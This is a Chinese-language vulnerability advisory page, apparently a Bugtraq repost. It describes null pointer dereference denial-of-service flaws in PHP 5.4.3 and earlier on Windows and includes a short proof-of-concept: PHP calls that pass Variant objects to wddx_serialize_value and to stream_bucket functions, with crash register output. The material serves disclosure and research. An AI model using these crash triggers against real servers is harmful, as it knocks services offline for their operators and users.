发布日期:2012-05-11
更新日期:2012-05-23受影响系统:
PHP PHP 5.4.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53643PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。PHP 5.4.3之前版本在实现时存在空指针引用导致的多个拒绝服务漏洞,攻击者可利用这些漏洞造成应用崩溃。<*来源:condis
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?php/*PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce
Author : condis
Date : 10.04.2012 AD
Website : http://cond.psychodela.pl----Download : http://php.net/downloads.phpTested on:
PHP 5.3.8 + Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0 + Windows XP SP3 Professional PL
PHP 5.4.3 + Windows XP SP3 Professional PL
Description:wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant
object when it is given as a first argument.Registers: EAX 00000000
ECX 1056AAE8 php5ts.1056AAE8
EDX 100EFCE0 php5ts.100EFCE0
EBX 01032AB0
ESP 00C0FAE0
EBP 00000000
ESI 0121E478
EDI 0121CB50
EIP 1028F22E php5ts.1028F22ECrash: 1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25]Situation looks pretty much the same for both wddx_serialize_vars and
wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append
have some problems with handling Variant object when given as a second argument:stream_bucket_append(1, new Variant(1));
stream_bucket_prepend(1, new Variant(1));PS : Variant object is only available in PHP for Windows OS and it was implemented
in PHP > 4.1.0 and PHP 5.For more details check : http://php.net/manual/en/class.variant.phpPS2: After running this via webserver my Apache wasn"t able to handle requests
anymore and I had to restart him :)kthxbye*/wddx_serialize_value(new Variant(666));?>建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.php.netWireshark未对齐内存拒绝服务漏洞HAProxy Trash缓冲区溢出漏洞相关资讯 拒绝服务漏洞
- 数字签名拒绝服务漏洞(CVE-2013- (11/13/2013 12:25:03)
- Intel 82574L Gigabit Ethernet (03/01/2013 21:09:03)
- Wireshark DTN Dissector 拒绝服务 (02/03/2013 10:37:43)
| - Rockwell Automation FactoryTalk (04/10/2013 09:08:12)
- IBM WebSphere Message Broker多个 (03/01/2013 21:04:45)
- HP XP P9000 Command View (02/03/2013 10:36:32)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站